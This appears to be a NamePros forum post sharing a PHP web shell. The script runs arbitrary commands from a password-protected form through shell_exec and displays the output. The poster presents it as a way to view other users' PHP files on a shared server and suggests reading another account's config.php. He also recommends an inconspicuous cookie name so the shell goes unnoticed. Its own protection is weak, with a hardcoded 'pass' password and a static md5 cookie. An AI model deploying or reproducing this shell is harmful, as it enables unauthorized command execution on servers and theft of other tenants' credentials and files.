NameSilo

Shell execution script

Spaceship Spaceship
Watch
U

unclekyky

Established Member
★★★★★★★★★★
Impact
0
just a really simple, somewhat pointless, script that _can_ be used to view other peoples PHP files (on the same server).

im sharing it to demonstrate a simple authentication method, highlighting php files, and using shell_exec.

some usefull linux shell comands are:
ls /home/bob/public_html/
cat /home/bob/public_html/config.php

the script should work as is with the password "pass" (no quotes).
PHP: 
<?php
// what is the password?
$pass = 'pass';
// cookie name - consider changing this to something that people won't suspect
$cookie_name = 'wjcookie';
// md5() the password
$md5_pass = md5($pass);

// checks to see if the cookie is set
if (!isset($_COOKIE[$cookie_name]))
{
	//if the cookie isn't set and the form hasn't been submitted: echo the form
	if (!isset($_POST['conf']))
	{
		echo "Password: <form action='{$_SERVER['PHP_SELF']}' method='post'>
				<input type='password' name='password'><br />
				<input type='hidden' name='conf'>
				<input type='submit'>
				</form>";
		die();
	}
	//if the cookie isn't set and the form has been submitted: check to see if the passwords match
	else 
	{
		if ($_POST['password'] == $pass)
		{
			setcookie($cookie_name, $md5_pass, time()+3600, '/');
		}
		else 
		{
			die('Wrong password.');
		}
	}
}
// if the cookie is set but the passwords don't match, then die
if (isset($_COOKIE[$cookie_name]))
{
	if ($_COOKIE[$cookie_name] != $md5_pass)
	{
		die("Invalid cookie information.");
	}
}
// if the passwords in the cookie match echo the form for the shell command
echo "<h2>Shell Execution Script</h2>
		<form method='post' action='{$_SERVER['PHP_SELF']}'>
		<input type='text' name='input' size='90'><br />
		<input type='submit'>
		</form>
		<br />";
// die if the form hasn't been submitted
if (!isset($_POST['input']))
{
	die();
}
// get the output from the command that was executed
$output = shell_exec($_POST['input']);
// this checks to see if the file is PHP then highlights it.
if (preg_match("/<?php/i", $output) || preg_match('/\.php/i', $_POST['input']))
{
	highlight_string($output);
	die();
}
// if not PHP then it echos it out to the screen
echo nl2br(htmlspecialchars($output));
// command wasn't successfull
if ($output == NULL)
{
	echo "No output.";
}
?>
 
Click to expand...
Reply
0
0 Like
0 Thanks
•••
The views expressed on this page by users and staff are their own, not those of NamePros.
Log in or sign up to reply here.

Similar threads

igofirst
  • Locked
[Only 5 copies available] Complete auto blogging method- Auto blog software included
3 replies
515 views
tiletalk
tiletalk
frostify
  • Locked
Starter LiveMessenger.org | Messaging and Chat Room Site
4 replies
850 views
frostify
frostify
rockefeller
Assistance needed with GoDaddy registration path
1 reply
975 views
rockefeller
rockefeller
ecommerce_guru
  • Locked
Turnkey Adrl.net | URL Shortener System for Sale!
1 reply
1K views
Mannu24
Mannu24
NickB
information 5000 (most?) popular English word list
19 replies
6K views
DmytroK.
DmytroK.

We're social

Escrow.com

New posts

Auction activity

Domain Recover

What non .com extensions have you sold in 2024?

Polls of interest

Popular this week

Catchy

Community favorite

Popular this month

Blog favorites

  • The sidebar remains visible by scrolling at a speed relative to the page’s height.
Back